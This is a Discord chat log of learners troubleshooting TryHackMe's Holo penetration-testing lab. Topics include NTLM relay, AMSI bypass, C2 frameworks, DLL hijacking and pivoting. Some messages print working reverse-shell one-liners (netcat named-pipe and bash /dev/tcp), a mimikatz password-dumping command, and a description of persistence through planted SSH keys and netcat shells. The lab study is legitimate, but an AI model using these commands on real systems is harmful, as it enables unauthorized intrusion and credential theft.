#holo-network

PC-FILESRV01 in 10.200.110.0 does not receive any SMB connections - literarily 0. I checked that with Wireshark (tcp.port == 445). Executing NTLM Relay is not feasible. Restarting PC-FILESSRV01 did not help. I will reset the network but it is the second network with such issues (10.200.128.0 has them as well). Is it a common issue? Anybody had it? Is resetting the network going to resolve it?

@lone spruce do you want me to rebuild S-SRV02 this weekend

well, next

I think S-SRV02 was also cloned and it broke priv esc

Currently the last attack for the network is broken. You're describing the problem exactly as it is

Thanks for confirming!

Gave +1 Rep to @solid timber

If it doesn’t violate your NDA yeah. I’m fair too busy rn

Hi

Is there a way to use burp with a website over sshuttle? It doesn't seem to work for me

And I can kinda understand why, just me and google dont seem to have a solution

I used ss -anpt to find that sshuttle listens on localhost 12300, so I made a rule in burp upstream proxies to send all upstream traffic to localhost 12300, but it seems to not go through as the webpage at 10.200.131.31 doesnt load

I think it just plain worked for me.
Sshuttle uses iptables rules, I don't think you need to do anything special.

I never got around to finishing the AV stuff, but I don't think I had any problem with running burpsuite through sshuttle.

Hey, im having trouble with AV dectection, my amsi bypass seems to be working because the server requests the payload (obfuscated powershell reverse shell) from my server.
but thats as far as i can get, can anyone give me sanity check on this process

what have you done so far?

i made it work by using cobaltstrike stager in the end

gotcha

but before that i thought i patched amsi and just had to get a shell

which didnt work

i then dumped the hashes and i can pass the hash with crackmapexec using smb, but get no answer on winrm, is that intended?

yes

ok, got it now, thanks!

Gave +1 Rep to @solid timber

Is NTLM relay fixed?

What? None of that needs to happen when a network is reset? And a network requires some pretty strict requirements to be reset

@wind bobcat

@wind bobcat Do you know when NTLM relay will be fixed?

hi guys, i have a problem with grunts stager in covenant.... i have followed rastamouse guide and change covenant signature checked by threatcheck.exe and upload it on the server S-SRV01 and it works but when i receive the grunts in covenant it don't work it tell me that grunts is untrusted or unitialized when i launch powershell whoami command...anyone can tell me why?

hello

@frail axle where you able to complete dll injection

No, it did not work for me. I had to use another way to privesc.

Is anyone online?

Hi

in

second this**

requesting the machine to be spun up

Hello, network is up , but I can't see any machines . pls someone dm me

ntlm relay not fixed yet?

we're waiting for the VM be deployed into the network dev segment

getting anything done during aoc is essentially impossible lol

Is NTLM relay fixed?

...no

Thx

Gave +1 Rep to @wind bobcat

Any view when it will be fixed? This is the last task that I need to do in order to complete Holo.

I cannot provide any time estimate. AOC is going in and all thm staff are swamped.

Thx. I understand.

No it has nothing to do with nmap

The Holo network also doesn't appear to be responding to me (or at least; poorly). It was working earlier today, but now a ping doesn't get a response.

Okay so the 'main' website (DC-SRV01) is listed as being hosted on 10.200.178.30 on THM, but appears to actually be hosted at 10.200.178.33.

Adding the following to my hosts file allows me to continue working:

10.200.178.33 holo.live
10.200.178.33 www.holo.live
10.200.178.33 admin.holo.live
10.200.178.33 dev.holo.live

the main website is hosted on L-SRV01.

its displayed correctly.

Aaaaah! I somehow figured the DC was the main one as it was on the top, but you're totally right! Thanks!

Knock knock!!! I am on task 28. Which user wordlist should i use?

OOhh yeah got that sorry i already had that.

hello mate! I am on task 28 how can we get that of reset token. i got user-token but not reset_token.

I mean i did forget password got user token and phpsessionID now how can i login?

Well solve that.... It was easy but a bit tricky.

L-SRV01 is dead (at least for me). I had chisel running on it, when suddenly the connection broke down. It also is not reachable over ssh anymore... Tried leaving the room and entering it again. No success. Tried regenerating the ovpn file, no success either. Anyone else experiencing issues like this?

that sounds like another user shutdown the server tbh

either that or its related to the AWS troubles

I had this problem before 1 hour when you wrote this message here bcz the whole network was reset. SSHUTTLE was not working but chisel worked. So didn't do much and i just shutdown my system and now i am gonna do that again.

do you guys have problem running sshuttle? i am still facing it.

Ok fixed...

Bomm!! Connect with everything.... Everything working fine now.

Hey guys, I am stuck on finding the password in task 17, can I get a hand

Did you read the task17 clearly? Read one more time.

Ok I must be doing something wrong. I’m stuck on trying to root pc-filesrv01. No way to run the vulnerable app and no scheduled task

If you see closely you find everything on the same place you just need to hijack.

Ofcourse you can not that app because you are not administrator.

But if you wanna try and dive deeper you can download the same app on your local system and try.

But the privesc method is a dll hijack for the app and it doesn’t run. I know what needs to be done, it just isn’t doing it

Bro its scheduled task if i am not wrong...

It’s not. There are no scheduled tasks in the users directory

Nothing calls that app, that’s what I’m saying

how is that possible? I checked that.

DM

Ok so we’ll call it a bug. On to other things

Thanks @rigid carbon

Gave +1 Rep to @rigid carbon

Ohh your welcome mate....

I feel like I'm blind, I must have read through it a thousand times and am just not getting it

You have a remote shell into the box, what files are in the directory? One very interesting file holds the answers for the task

IDK what i am doing wrong but i am stuck at the task 43 and yes its kinda shameful but please help 😅

any help would be appreciated

Its crazy i am stuck on the same point.

any Moderator can please check the holo machine for task 43 priv esc

Another user pointed me at a different path than the scheduled task, it involves a printer. What a nightmare. I can’t pivot to the last box though so I’m giving up for now

Yea. This is how I did that part. The NTLM relay is broken as of now and likely won't be fixed till some time in January cuz all of THM is extremely busy with AoC right now

Makes sense, at least I did all the hard parts 😂

Remember that's not what mods are for. Mods are discord staff.

Oh my bad

I mean admins who controls the machines

Can you explain me about this another way please
Can I dm you directly for it ??

I tried to create another schedule task with few other path which i got from applocker_bypass_checker and task triggered and as expected asked for admin privileges but didn't get shell

still working on that.

Boommm!!!! and Done.

Is NTLM relay fixed?

task 10. error on running gobuster: unable to connect to http://xxx.10.200.126.33/: Get "http://xxx.10.200.126.33/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

what's xxx.10.200.126.33?

its subdomain of first web server

I can tell you it's not suppose to be www.10.200.126.33

or dev.10.200.126.33

it's suppose to be www.holo.live

or dev.holo.live

i added this ip as holo.live in hosts, but it didnt help

if you're calling the IP address and not holo.live of course it won't help

it does DNS -> IP translation, not IP -> DNS

ok, but i dont understand what should i do to make it work ?

if you're trying to enumerate files and directories on the webserver:
gobuster dir -u www.holo.live -w /path/to/wordlist

if you're trying to enumerate subdomains:
gobuster vhost -u holo.live -w /path/to/wordlist

with your /etc/hosts file having

10.200.126.33      holo.live

in it

and for each new subdomain you discover, add 10.200.126.33 newsubdomain.holo.live

then you can access it like you normally can for a standard website.

oh, thanks)

i dont think waiting for any message for 10 mins

NTLM-Relay is broken we must wait for tryhackme team to fix that.

its not normal for none of the machines to respond to nmap and pings, right?

hi guys
i need help with the PC-FILESRV01, i can not run the application kavremover because it is blocked
any hints? ideas?

you're not suppose to run it.

not on pc-filesrv anyways..m

it is a scheduled task which is right now not working for some time

https://github.com/gyaansastra/Print-Nightmare-LPE

use this method instead

i really appreciate your response, thank you soooo much

Gave +1 Rep to @foggy spire

hello, has anyone had problems regarding the holo network? it timed out for me and when I started it again, i cannot access the initial linux system
i am connected to the VPN

can't reset it either, since I need 2 more reset votes

thanks for it)

Gave +1 Rep to @foggy spire

Hi, I'm having an issue with adding holo.live to my /etc/hosts file. I added the line "10.200.107.33 holo.live", but when I try connections to holo.live within my browser, nothing happens and it just says "unable to connect"... Any idea why ? kinda frustrating... (btw I can connect to the webserver using 10.200.107.33)

or "Hmm. We’re having trouble finding that site."

trh removing the www

yes, did that as well, still no luck

and tried to add the www to etc/hosts

finally works... I added www.holo.live in /etc/hosts (as I did prior) and restarted the network... don't know what happened...

Is NTLM relay fixed?

Hey

Fun challenge even if you can only make it ~90% of the way atm. I was convinced I was doing something wrong and was double and triple checking every command only to see there are some known issues with step 43+

Kinda stuck with the amsi bypass and everything, any idea ? Thanks...

(I've managed the AMSI part, but don't understand how I'm getting a reverse shell...)

Ok now something new : I'm getting an error, can't connect back to the machines on the network : no route to host when ssh as linux-admin

(shut after the network shutdown because I forgot to add time 🤦)

Nevermind, I got it !

And for this part, had to wait for the network to shutdown and then restart it...

If I am VIP and started Holo today, will I have access after 9 days?

you need to rejoin after 9 days - this is so users can be evenly distributed across multiple subnets

anyone wanna chat about the room and the info from there? got blocked at some points

I'm at task 39, if I can help !

that'd be awesome. can i dm u?

And I'm stuck, I've got nothing in mod loads, so can't identify an anti-malware solution

Sure !

Got it running : ||seatbelt instead||

Hey, how did you find this ? I'm interested in the methodology you used... many thanks

Gave +1 Rep to @foggy spire

This community man

Plus I am currently studying AD for some certs 😅

Okay well thank you ! 😉

Is it normal that procmon doesn't show anything ? Am I missing something ? because the vulnerable ||wow64log.||dll doesn't even exist...

That's the thing man

Holo is en broken

Right now

Oh okay... 😢

Yeah so we can't go any further for now ?

Will the answers be deleted?

Yep

Thanks

They will not.

No, your progress is not cleared.

My bad, I thought the progress was saved but the answers were deleted, but I checked on wreath and you're right !

Thank you both!

Any changes to machines will be lost as you're likely to end up on a new network

Also, what can I do to be room or/and room tester on @final patio ?

Someone that can help me with domain enumeration, please? Task 9-10

DM me

I need help

TASK43
What is the name of the vulnerable application found on PC-FILESRV01

tree /f is your friend.
Remember, portable applications don't need to be installed in the c:\Program* folders.

someone online that can help me at tasks 9-10?

PC-FILESRV01
Not run ?

It is close

Im waiting lot time ?

its meant to say "tools and tools" correct?

Hi guys is there someone who wants to discuss about the av evasion part. I'm able to gain access to the machine through not the intended way however would like to do it. I mean with this generate a covenant grunt and obfuscate in a manner so it can bypass amsi and defender?

Is NTLM relay fixed on PC-FILESRV01? Just asking.

I am getting

net.domain.name

even though i have added www.holo.live in etc/hosts

Is that broken or am i making any mistake

Remove the “www”

Should only be “holo.live”

thanks bruh

any two please vote for holo network reset

webserver is unreachable

admin web app is hanging, please vote for a reset

I don't have any problems with the admin app. It's loading fine for rme.

There a lot of different subnets. Please specify

In task 29

Now that we have successful authentication to the web app we know that we have an upload page, however, from code analysis the page uses client-side filtering meaning we can only upload images.

…but I don't see this. Looking at the JS I don't see anything that would reject files from being uploaded. I can upload any type of file.

I suppose someone could have removed this filter from the js on the server? (This server is in the 10.200.135.0/24 subnet for me)

10.200.95.0/24

Anybody had any problems with the time in covenant?

Always have one hour than my system and can’t execute any commands

using firefox you must go to this config url about:config and search javacript. You must disable javacript.enabled.

Anyone having issues with the VPN IP address not being within the hololive IP range? I get a 10.50.x.x when hololive is a 10.200.x.x. I went ahead and regenerates my VPN and still the same.

@honest oasis the scope you’re given is “10.200.x.0”. The third octect is filled in with wtv 3 numbers you were given in your network diagram (L-SRV01). Thats ur scope and u scan the entire subnet (network range) and see what hosts are down or up and go from there

So I tried to fping the entire subnet with no luck and let Nmap run on the entire subnet and only got a .250 (last octet) that had port 22 SSH open. Nothing along the lines of a web server which is being asked for in the first set of questions. No routing needs to be completed for the room correct?

My scan looked like this:
sudo nmap -sV -sC -p- -v -oN holo.txt 10.200.x.0/24

Can u ping 10.200.x.33? @honest oasis

Nope says Destination Host Unreachable

Are u connected to the hololive (network) vpn?

I am yes but the hololive VPN has me in a 10.50 range not a 10.200 range

Correct

My hololive vpn is also 10.50.x.x. But the focus is being able to talk to 10.200

U started the network correct?

The network state says: running

In the current window it has running, yes.

Thats weird. I would ask cryllic or spooks then, I dont know what the issue could be lol

All good, thanks for helping. I was also not sure cause the tasks never say anything about having to do any routing so wanted to reach out here first

Yea no problem. Hopefully ur issue gets fixed soon

i cant find the vhost other then www in task10

anyone?

@sullen adder the vhost enumeration url should be holo.live

oh ok

it still give me the answer to 2 question

Related to Task 36

On S-SRV01 you're supposed to dump a cleartext password using mimikatz, however this doesn't seem to work anymore.

I have a Cobalt Strike beacon on the box and I ran this command:

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit

No clear text password to be found... in the output.

The HTLM hash is crackable with rockyou.txt wordlist though.

Also, you're supposed to be able to authenticate to PC-FILESRV01 with the domain creds/NTLM hash dumped before. That also doesn't work.

RDP login does work though...

Maybe someone made some changes here and there?

Network: 10.200.95.0/24

cry designed that portion iirc.
@lone spruce is that intended

Hey

Can someone hep on reset the network of Holo please ?

you need to specify the subnet you're in

@lone spruce Is NTLM relay fixed on PC-FILESRV01? Just asking.

@lone spruce There is also no scheduled task on PC-FILESRV01 that runs the vulnerable app to do the PrivEsc.
Network: 10.200.95.0/24

Hi guys! Concerning Task 20 (PrivEsc after escaping the container): The exploit requires sudo to work. However, so far there wasn't any hint or mentioning of that. Did I miss something?

nvm, i was overcomplicating things, in combination with being not too familiar with the container commands. got it now! 😄

When I'm creating a default HTTP Listener in Covenant, nothing happens. Covenant is running as root and I have tried different ports... can someone help me pls?

Am I the only one having trouble with Covenant??

Haven't played with Covenant for a while but I would expect that basic functionality would just work.
I used Cobalt Strike in the Holo labs, I haven't tried to do it with Covenant.

That being said, you say you created a listener, but did you also create a grunt and ran that on the victim box?

I tried to create a listener. After filling in all the required values and clicking CREATE, there is no listener in the list. So there is no listener to select when creating a launcher or grunt

Not sure why that is based in to information you provided. Maybe just try a different c2 framework such as Empire?

could be the port is already in use?

likely if you're using the attack box

hey folks, sorry about the delay on SRV02 - The rebuild is almost done.

Will that also bring PC-FILESRV01 back in order as there also seem to be things that look out of order.
(See my previous comments)

i cant break out of the docker env in task 18

i am getting connected as the same user with reverse shell

0

In theory - yes.
Waiting on Skidy and Ashu.

your http query is a bit botched, you may want to look at that.

Great, looking forward to finish Holo. I finished Wreath in the mean time...

hey quick question..

I completely understand the concept but I've never setup a server before and they include a index.php file with some *.jpg's and want you to get a "prototype" running on your own LAMP server.. I can get it to load a index.php and other directories but to do a LFI you have to issue a URL such as http://127.0.0.1/img.php?file=CatPics.jpg and I keep getting a 404.. There is no img.php and to my understanding its supposed to load catpics.jpg but well... doesnt.. what am i missing?

CatDog room?

lol..

Do you know that room?

Take a look at the one

I see a https://tryhackme.com/room/catpictures room.. lol

ahhh... https://tryhackme.com/room/dogcat

totally thought you was just referring this room because I mentioned catpics.jpg.. Its a LFI room.. 🤦‍♂️

Yeah, will try Empire, I guess. Btw, this is the problem: https://github.com/cobbr/Covenant/issues/327

Oh well, I don't like saying this but that sums up my experience with Covenant to be honest...
When I started playing with it soon after it's first release, I found a lot of problems as well. And this seems to persist. Development is just too slow on this project I feel. And this is in no way a blame to the project maintainers, we're all busy people!

I like the idea of a C# based C2 framework but IMO Covenant isn't mature enough to consider to be used on a real engagement, Empire is still viable in some real world environments and there are other frameworks that are more stable and mature, both open source and paid products.

yeah... I just wish there were a note of some sort on the Holo Room where Covenant is introduced. The bug was raised in July, so... people are bound to hit the same problem 🤨

i am getting this error while submitting the user_token

Notice: Undefined index: password in C:\web\htdocs\login.php on line 6

I can see one major issue - dotnet run isn't being executed as root. That would be the reason for not binding on low level ports

in one screenshot:

https://user-images.githubusercontent.com/11423158/125192017-d0e19e80-e245-11eb-8c98-5b5c42a8c7c8.png

we loose the 9 day access to holo

can we never access it again?

got it

Hi, what's the network's status ? Is the ntm relay fixed ?

hey guys i got 404 when downloading hololive ovpn file
can anyone help with this tech issue

I did run dotnet with sudo. But even without, then it should at least work with higher ports, which it didn't. As I mentioned earlier, there is an open bug issue from July, which addresses the exact same issue that I am having with Covenant. So, either the maintainers get to fix it or I (we) will have to use other C2 frameworks...

Question about Tasks 30 - 35 (AV Evasion): Is there anything we are supposed to do (code) here? The texts are all written in a way that suggests we have some kind of coding project, but it never mentions anything in particular. Then, at the end of the last task, it says we have a binary that can avoid detection and that we should deploy with our C2 framework... What binary??

GruntHTTP.exe

Generate a Grunt launcher with Covenant. You can generate multiple types of launchers, one of them is an exe.

Just so you know, you don't have to use covenant or a C2 framework, if it bothers you too much, just craft a simple ps1 reverse shell that bypasses amsi detection and av...

Can anyone confirm ntm relay is still broken ?

Tried an hour ago. Still no luck 💔

Also there's no scheduled task

K thanks 😢

Gave +1 Rep to @green cobalt

Hey gents

Looking for some guidance on PC-FILESRV01

added DLL to appliacation path

but i can't initiate the app itself

is this expected to be run via a system task ?

nothing on it 😐

grrr

Any tip ?

The Holo network is currently broken (see previous messages). Hopefully soon, they'll get it fixed...

I'm having issues with the shell of task 35

I got RCE using a PHP payload

but it seems like the server detects my covenant grunt

because I don't get a reaction to my listener

oh

I had a different bind port

Oh I thought somebody patched the webserver that prevented my shell from working lol. Well I pivoted to Virtual Hacking Labs. Trying to get as much discount training as I can from my $1,400 stimulus check.

The first box (webserver) should be fine, unless some a***hole made change to the config, then a network reset can help...

Is there a problem with 10.200.120.0/24? Because I have chisel running and I can't seem to reach S-SRV01 with either netcat or nmap using proxychains

But I was able to reach 10.200.120.250

Well. At least I got my $60 worth from Throwback

hello Friends, I am planning to start with Holo Room, but I am afraid I will face the same issues as with wreath, because in wreath some times I was stuck cant connect to the machines., is it the same or better 😄 ?

It happened to me 2 times, but just let the network expire, start it back and works again ! Though you won't be able to finish the network since it's broken (ntm relay)

thanks @zenith delta , Great Advice ☺️

Gave +1 Rep to @young stump

hello, can someone help me at task 10 - what the fuzz?

What's up ?

Thanks @zenith delta !

Gave +1 Rep to @young stump

has anyone ever ransomed one of the networks lol

obviously would just be annoying but was curious

we haven't ever heard of it

likely wouldn't work because of lack of outbound network access

I mean with VPN access right?

the machines still can't beacon out

so the decryption keys would be lost completely, unless said ransomware just didn't care

Oh yeah I just meant someone being a jerk

but in all our time, we haven't heard of it

Hi , I need some help on task 10 of this network

will anyone be able to help on this

?

Sure, what's up ?

Heyo

Is anybody free at the moment . I need some help

yep

Is anybody free at the moment? I need some help

sure

Anybody around to give a little push ? i am stuck on a specific task

i can't log into the webapp with the admin creds.

It keeps kicking me to the index.php page. is this right?

Any hint on AMSI bypass, I've a working and tested AMSI-bypass script, which I can't get running on SRV01 for some reason

Amsi.fail

still no news on the ntm relay fix ?

@wind bobcat ?

Tried all methods in this, can I pm regarding the payload?

I've rooted l-srv01

Is holo network part ment to completed at a strech

Or should we start over all again if the network goes down

There are some definite checkpoints

Creds or keys make it easy to get back into that host

anyone around to give a little nudge on task28 please

anyone successfully installed covenant on arch linux?

yes i did

can I DM you, I am having trouble installing covenant on arch regarding the SDK

sure

What script are you using?

Nevermind I got it working

Used invoke-psobfuscation.

Hi, can someone tell me why DLL hijacking fails ? I'm working on Holo

I had the same problem a week ago, I think that is because the required service isn't running on the PC-FILESRV01 box. I believe they disabled this because the ntlm relaying part in Holo network is broken and they are fixing this...

thank you

Gave +1 Rep to @solid oasis

yo really need help here on task 37 "good intentions, courtesy of microsoft: part II" im at the part i got a nt hash and a user and now need to use either crackmapexec or evil-winrm. note im using chisel for the tunneling. but i get nothing. not a single thing comes up idk what im doing wrong. when i type proxychains and when crackmapexec i just gets like [proxychains] strict chain with timeout. banging the head to the wall. plus xfreerdp dont work either. HELP... anyone...

ntl

gona commit death

tried sshuttle and work instantly

damm

The lab needs to be reset - the web server is down.

Is this seriously how this works? The lab is a shared environment so someone wrecks the web server and now I have to wait until 3 other people agree to reset the environment?

There are multiple shared instances. This is the only reasonable way we can facilitate a network that does not require an increased fee. The likelihood of you encountering another user is low.

I get it. Just not happy with the web server being down in this instance. Don't mind me being disgruntled.

Yeah so now the webserver is completely offline. Please vote to reset.

Hey, can some one press reset button on holo room? 😄 Need 2 votes. Thanks in advance.

I did but it looks like I voted too recently.

I'll vote again after times up

so you all kind of need to tell each other which subnets you're in

Yeah we worked that out

yo on task 43 i have done everything but the kavremover cant be open just get a pop up saying "this app has been blocked by your system administrator" have i missed something. stuck for like 1 or 2 days

the dll hijack dont work im just waiting nothing happens

pls anyone help

do you know when it will be foxed or so?

guys, i've done the nmap scan and it resulted 2 ips: 10.200.110.33 and 10.200.110.250 are they correct? because i think only the 10.200.110.33 should appear due the first question at task 8

250 is internal thm infrastructure.

so i dont need it for the network yeah?

Nope, don't know... I'm waiting for a fix myself 🤷‍♂️

so we need to wait or is there a work around? tried the exploit printnightmare but dont really work so

If you want to follow the intended path then I guess we'll have to wait. I don't know other paths, haven't tried that due to time constraints

need 2 votes to reset network for subnet 192.168.100.xx

could anyone help with it

192.168.100.x is the docker Subnet

that's the same across all networks

oh okay

Anyone having connectivity issues?

Labs been in resetting state for over 1h

it's now running again

Task 10 - What file loads images for the development domain?

Any nudge ?

fuzzing 😉

intercept the web request

Was anyone able to create a binary grunt launcher that bypasses AMSI and Defender? I ended up having to use a powershell payload.

Should I run gobuster again ?

Let me do this

Hi is the lab working again for NTLM relays? Right now on other things with my homelab and VHL.

Hey guys,
when the time runs out and the network state is "stopped" will a restart (not an extend) reset the webserver as well?

no

its just sleeping

guys whats the ip of the webserver? it is not connecting and nmap isnt helpful

isnt it showing the ip address in the image at top of the page?

thm says L-SRV01=192.168.100.1 and L-SRV02=192.168.100.100 but i cant connect at any of these

when I type www.holo.live on browser it automatically redirect to https and doesn't load at all ..

What does it say for DC-SRV01?

10.200.110.30

i thought that L-SRV01 should start with 10.200.110.X as well and only L-SRV02 should have an 192.168.X.X address.

thats the problem

i am confused due this

I checked 10.200.111.33 but don't see port 80 opened

i checked all 10.200.100.x/24 10.200.110.x/24 192.168.100.x/24 and no results

Seems like issue with tenants.. I don't have port 80 open on 10.220.111.33

Let's reset the network and see

ok, i restarted all and rescanned all and 10.200.110.33 its working thx for the help guys

+rep @ocean hare

Gave +1 Rep to @ocean hare

Still am facing issue with 10.200.111.0/24 segment.. Can people help me with resetr

try to restart you guest or wait for the reset of the machine

guys im using chisel, the connection is up /etc/proxychains.conf is setted but is not working, any one who can

@opal scarab what's the chisel command you ran on your machine and what's the command you ran on the remote box?

attacker

remote box

and i presume your proxychains.conf file has socks5 127.0.0.1 1080 at the end?

yes

okay, so that should be fine

can you spawn yourself a new ssh session inside the network and try curling the webserver from there directly?

maybe it's just dead for some reason

config

mhhhhh probably its just dead

Still Stuck with Task 10 "What file loads images for the development domain?" any help

find an image on dev.holo.live, right click, open in a new tab @winter barn

Got it ..

@wind bobcat any update on the ntmrelay fix ? (Thx)

yeah. hoping it will be fixed next week since my subs will end soon.

assuming the machines were cloned last week, it should be fixed.
I haven't had time to test it, I've been busy traveling for work

k, I'll try this afternoon then 😉 thanks for the incredible work anyway !

ANyone having network issues?

Am not able to get Reverse Shell ..

No sure the problem

can we reset the network pls?

Which network you are in ?

i would say Dio is in the x.x.110.x and Abhi in the x.x.111.x
We had that yesterday already 😄

haha..

Hey guys. I am trying to escape the docker container on L-SRV02.
Here is what I am doing in the container shell
curl 192.168.100.1:8080/shell.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f
and in my attacking machine,
nc -nvlp PORT

I am receiving the shell on my terminal but it is of the container only. I am not receiving the shell of the actual machine.

My confusion: The RCE is on the actual machine. When I do ?cmd=ifconfig, I am able to see the network information of the actual machine, not the container. So, when I am running a reverse shell payload, shouldn't that execute as the actual machine?

you're not wrapping the whole url string in single quotes

otherwise those semi colons are interpreting the command as is

the server is only seeing rm, the container is seeing /tmp/;mkfifo...

Can I DM?

it would be better if we didn't, others can use this as a learning opportunity

sure

Want to know the purpose of doing it the way it is shown in the labs.

Isn't this much simpler, if done correctly?

how do you mean "if done correctly?"

I mean by adding the quotes to the payload

special bash operators aren't interpreted by the machine when wrapped in single quotes, essentially your curl command is forking off into 3-4 different commands.

Really, it has to be done that way if you're using curl. You have one other option which is to url encode the whole command

you can also escape each special character, but that's incredibly impractical.
https://tldp.org/LDP/Bash-Beginners-Guide/html/sect_03_03.html

Ah. I get it mate

Thanks 🙂

I can confirm, the holo network is now working like a charm, inclueding the ntmrelay exploit ! 😉

with that said, if your network hadn't been reset and it still no worky - restart network

Is the Holo network non-responsive for anyone else?

can't even ping the first host

seems the VPN might be an issue?

[+] Confirming connectivity
[-] Something went wrong -- please ask for further assistance in the TryHackMe Discord server, subreddit, or forum

(from the troubleshoot script, everything else was OK/green)

Just did vpn to the holo network, seems everything working fine. Have you tried to access websites via hostnames?

port 80 isn't even open

nmap -Pn -p 80 10.200.142.30
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 14:57 EST
Nmap scan report for 10.200.142.30
Host is up.

PORT STATE SERVICE
80/tcp filtered http

Nmap done: 1 IP address (1 host up) scanned in 2.05 seconds

Try to scan 100.200.135.33

As remmeber, that should be starting point

not according to my network diagram

To navigate you to the web server

mine lists 10.200.142.30 as the start

oh wait I think I looked at the wrong host, but I don't think 135.33 is responding either

yeah port 80 is still filtered

ok now it's working

weird, I scanned it and got no port 80 a few mins ago

Nvm, enjoy in hacking

streaming it later 🙂

Nice, how much you are planning to cover from Holo network? 🙂

the entire thing over several streams

I cannot get a Covenant binary launcher to bypass AV. Seems to be AMSI; when I execute the payload I see a a grayed out “untrusted” check in within Covenant. The check in is not actually successful unless I disable Real Time Protection. Anyone gotten a Covenant binary to completely bypass AMSI and Defender?

Maybe need to chain an AMSI bypass with a Covenant executable that bypasses Defender? Not sure how to do that however.

You can bypass AMSI (but not covered in the lab), with powershell reflection, patching of the spawned AMSI process, or editing the registry with a JScript shellcode runner

I’m coming back guys, I just heard the lab is all good. So tonight I’ll get started again

Is it possible to combine an AMSI bypass and the Covenant launcher into one binary?

I’ll PM you.

Is NTLM relay fixed on PC-FILESRV01? Just asking.

Yes

Great news! Big thanks!

Gave +1 Rep to @young stump

Cant seem to log into the admin dashboard, I can enter the username and password but it never logs me in. Any tips?

Can we get 1 more vote to reset 10.200.146.x please?

Hi, in the holo network. I have added the ip address to the hosts file. But i can not visit the website with the hostname. Is this normal?

Which (sub)domains did you add to your hosts file?

I added || holo.live, dev.holo.live || to my host file.

maybe also try adding www.holo.live

I have in total 4 domains added

Also try to type the full URL in the address bar of browser like http://holo.live
If not then some browsers do a google search and they default to https.

Thanks i will try it.

Gave +1 Rep to @solid oasis

Ok, something strange mit the dots on my keyboard. I added entry in a new line and took the dots from the numpad, now its working👍

Need some help, guys. In the pivoting portion, it seems to me we are pivoting into the "same" network. The IP of our foothold machine is 10.200.133.33 which is the part of the 10.200.133.0/24. Now, with pivoting, we can access the other machines of the same network as well.
My question is that why weren't we able to access these "new" machines before? We knew from the initial info that the network is 10.200.133.0/24. All of the machines that we are now able to "see" are of the same network. How is that now from "within" the 10.200.133.33 machine we are able to see them but not during our initial recon?

im struggling with the password crack - section "Task 22 - Crack all the things"

can anyone help please?

Yep !

Correct me if I'm wrong, but I'd say that has to do with routing tables. I'm gessing the network's mask only allows discussions between 10.200.133.x (a mask of 255.255.255.0), but there is a rule that makes .33 accessible from the outside (so it works as a webserver). In pivoting, what you do is you basically send your requests through .33 and therefore, the router lets you discuss with other devices !

So, in simpler terms, you mean the network is set-up in such a way that the external devices can only access the .33 machine and not the others even though they are the part of the same network?

Yes, because you're not in the network

You can test that, with trying accessing some other machine on the network 10.200.133.x before and after pivoting

(the network being 10.200.133.0/24)

Anyone familiar with this issue? Its for Task 13

upgrade your shell, you can use python

@zenith delta DM me please

I shouldve put more context but the shell closes immediately after getting a connection so im not allowed to enter commands

Can you post code of the payload?

it worked the other day when i was working and now im trying to get to where i was

Try with this: /bin/bash%20-i%20>&%20/dev/tcp/10.50.125.98/4444%200>&1

i get nothing back

Oh f, have you tried to pass other commands to cmd parameter, to see if you are getting anything?

just got it, i used what you gave me but added "/bin/bash -c" in front, thank you for the help @pine ridge

Gave +1 Rep to @pine ridge

the commands were working, i tried "whoami" and "which python3" maybe something weird with that reverse shell idk

@buoyant marlin awesome, happy hacking

So im trying to upload chisel to L-SRV01 but im coming across an error error while loading shared libraries: libpcre2-8.so.0: cannot open shared object file: No such file or directory im not sure if this is because of the way i got root or the version of chisel i am uploading. I mention the way i got root because I cant find certain tools such as wget when i enter "which wget" but it exists when i go to /mnt/usr/bin/wget . I wont post the command i used for root because i dont want to spoil and idk how to use the spoiler cover over my messages.

So for task 34, I am supposed to use a AMSI bypass with a Covenant Launcher right? Powershell launcherr, JavaScript, or C#?

I'm kind of held up right now, I wished I installed the Windows Dev VM first before going down all these tasks. Now I am busy converting the VMWare image into a raw disk image for KVM. At least I left a persistent reverse root netcat shell in L-SRV01 so I can backtrack if the network timer goes out.

Do not try to pivot from the docker container you use to get root access

It gives you full access to the file system, but not immediate access to the actual system, if that makes sense

You can echo a public ssh key into root’s authorized keys so you can ssh into the actual machine as root, if you want to pivot as the root user

However, you do not need root to pivot, you can just use the linux-admin user that you should have cracked a password for

OK I'm clearly screwing something up and need a little help on task 9, everytime i run gobuster it says it "found" every single entry in the text list. gobuster vhost -u holo.live -w /usr/share/wordlists/dirb/common.txt

anyone know what i'm doing wrong?

You use the -b switch to exclude status codes that are false positives, Here is a example gobuster dir -u http://website.com --wildcard -t 10 -k -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --timeout 3600s -s 200 -b 429,404 -o gobuster-.txt

Actually my command was something I used on another box using dir bruteforcing, but you should try the -b switch.

don't I need to use a vhost since I'm trying to find subdomains? a dir is going to give me directories is it not?

I could totally be misunderstanding what's being asked though.

No you are looking for subdomains.

Use vhost

I actually didn't encounter your problem when I ran gobuster vhost, maybe your network needs a reset

I just ran a dir for the giggles just changed the FDQN to holo.live in your example and got 200s on everything

so maybe

did i screw up the hosts file? its just supposed to be the ip address and www.holo.live right?

You can submit one reset vote every hour. So if nobody on your network wants to vote. You can just keep adding reset votes once an hour and do something else like a different lab environment.

It was at 3/4 so i went ahead and hit reset on it.

Yeah try again, you should find two to three more subdomains.

still doing it... starting to wonder if I have an issue with gobuster itself

I decided to pause on the AMSI bypass exercise until I learn the basics of JScript Shellcode Runners from OSEP material. From what I understand, getting a AMSI bypass to work is the hardest part of holo. But I made myself persistent by adding my own SSH key to L-SRV01, so all I have to do is turn the network on again, SSH back in as root, restart Chisel, reset the password for the account in a later task, and then upload my payload.

Not sure what distro you use. But I switched from Kali to Parrot. I like Parrot better, the tools and interface is way faster. And xfreerdp isn't bugged like in the lateest Kali 2021-4a release.

I think the instructions are vague for AMSI bypass but I believe I am supposed to test out my AMSI evasion in the recommended developer VM first before proceeding.

maybe I should distro hop and see if I have success. I just uninstalled and reinstalled Gobuster and same thing. If anyone sees this tomorrow and I have not replied to this message I am likely still stuck. But its almost midnight here. So I am going to head to bed.

yeah I havn't even gotten there yet. I look forward to the challenge for sure.

